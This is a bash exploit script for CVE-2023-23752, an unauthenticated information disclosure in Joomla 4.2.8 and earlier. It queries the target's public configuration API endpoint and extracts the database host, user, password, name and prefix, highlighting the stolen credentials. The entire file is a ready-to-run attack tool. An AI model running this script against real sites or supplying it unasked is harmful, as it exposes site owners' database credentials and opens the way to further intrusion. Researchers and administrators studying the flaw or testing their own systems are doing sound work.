#!/bin/bash # Exploit Title: Joomla! <= 4.2.8 - Unauthenticated Information Disclosure # Date: 2024-05-21 # CVE: CVE-2023-23752 # Exploit Author: Miguel Redondo (aka d4t4s3c) # Vendor Homepage: https://www.joomla.org # Software Link: https://downloads.joomla.org # Version: <= 4.2.8 # Tested on: Linux # Category: Web Application while getopts ":u:" arg; do case ${arg} in u) url=${OPTARG}; let parameter_counter+=1 ;; esac done if [ -z "${url}" ]; then echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure" echo -e "\n[-] Usage: CVE-2023-23752.sh -u <url>\n" exit 1 else echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure" curl --silent --insecure "${url}/api/index.php/v1/config/application?public=true" > out.tmp echo -e "\n[i] Database info:\n" echo -e "[+] DB Type: $(sed -E 's/.*"dbtype":"([^"]+)".*/\1/' out.tmp)" echo -e "[+] DB Host: $(sed -E 's/.*"host":"([^"]+)".*/\1/' out.tmp)" echo -e "\e[92m[+] DB User: $(sed -E 's/.*"user":"([^"]+)".*/\1/' out.tmp)\e[0m" echo -e "\e[92m[+] DB Password: $(sed -E 's/.*"password":"([^"]+)".*/\1/' out.tmp)\e[0m" echo -e "[+] DB Name: $(sed -E 's/.*"db":"([^"]+)".*/\1/' out.tmp)" echo -e "[+] DB Prefix: $(sed -E 's/.*"dbprefix":"([^"]+)".*/\1/' out.tmp)" echo -e "[+] DB Encryptation: $(sed -E 's/.*"dbencryption":([0-9]+).*/\1/' out.tmp)\n" exit 0 fi